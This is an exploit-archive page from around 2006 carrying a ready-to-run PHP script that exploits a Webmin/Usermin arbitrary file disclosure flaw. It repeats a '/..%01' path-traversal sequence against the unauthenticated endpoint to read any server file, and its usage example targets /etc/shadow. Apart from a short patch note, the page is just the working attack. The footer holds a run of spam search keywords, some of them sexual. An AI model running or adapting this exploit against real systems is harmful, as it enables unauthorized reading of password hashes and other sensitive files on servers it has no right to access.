about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Webmin / Usermin Arbitrary File Disclosure Vulnerability




2006-07-09 Webmin / Usermin Arbitrary File Disclosure Vulnerability
Rated as : Critical Risk
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 	2006-06-30
Patch : update to version 1.290
Advisory :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != ""
&& $file != "") {
	

$z = "/..%01";
for ($i=0;$i<60;$i++) {
	$z.="/..%01";
}

$target =
$http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
	// IF INPUT IS NOT CORRECT DISPLAY THE README
	echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
	echo "Example : php webmin.php localhost 10000 http
/etc/shadow\n";
	echo "Coded by joffer , http://securitydot.net\n";
}

?>
securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 13:59:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php auth Www.School sex jogja wuyat.5d6d Analxxx t919t Www sexvid Subdreamer phpBB expl AAAAA.5@Wi www.hotsex exploit pe WWW.WORLD sexo free www.686.fj WWW.SEX PI tren de to starport namithahot Www.xxl PL ...id6.tx yahoosmost www.hkzx.n youtube.8 www.seoyea teenfuck A...b/modu telugu sex Nanncy ajr Moodle TRISHA.SEX Www seax c www.tharun gnss BLUE FILMS SQL Inject yeni river priyanka s www.avisoo www,santa walmart invsision Burning tamil+sexy bangla hot www.tharun Www fonero Potho www.szfk.o tamil+sexy